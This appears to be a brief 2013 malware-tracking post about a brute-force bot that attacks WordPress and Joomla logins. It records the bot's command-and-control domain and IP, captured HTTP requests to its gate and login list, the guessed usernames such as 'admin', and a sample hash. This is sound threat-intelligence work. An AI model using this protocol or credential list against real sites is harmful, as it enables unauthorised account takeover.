Resolved cureit.pw to 62.109.17.111
This is the same malware as this previous post.
Correct gate request
GET /cmd.php HTTP/1.0 Host: cureit.pw. Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse) HTTP/1.1 200 OK Date: Wed, 11 Sep 2013 19:17:35 GMT Server: Apache/2.2.24 (FreeBSD) PHP/5.4.15 mod_ssl/2.2.24 OpenSSL/1.0.1e X-Powered-By: PHP/5.4.15 Cache-Control: max-age=1 Expires: Wed, 11 Sep 2013 19:17:36 GMT Vary: Accept-Encoding Content-Length: 52 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html 1 30 hxxp://cureit.pw/temp_brut/1011888.txt wolf 480
Site list mirrored here. Both wordpress and Joomla sites are included in this list.
.
The username list has changed. The malware will attempt to use the domain name as the login username.
GET /login.txt HTTP/1.0
Host: cureit.pw.
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
HTTP/1.1 200 OK
Date: Wed, 11 Sep 2013 19:17:38 GMT
Server: Apache/2.2.24 (FreeBSD) PHP/5.4.15 mod_ssl/2.2.24 OpenSSL/1.0.1e
Last-Modified: Tue, 10 Sep 2013 18:40:04 GMT
ETag: "42d1d3e-2f-4e60bd545e900"
Accept-Ranges: bytes
Content-Length: 47
Cache-Control: max-age=604800
Expires: Wed, 18 Sep 2013 19:17:38 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
{domain}
{domain}.{zone}
admin
administrator
Hosting infos: http://whois.domaintools.com/62.109.17.111
Related md5s (Search on malwr.com to download samples)
Wordpress bruteforcer: 820da59811ea536331b7189bd86f3c72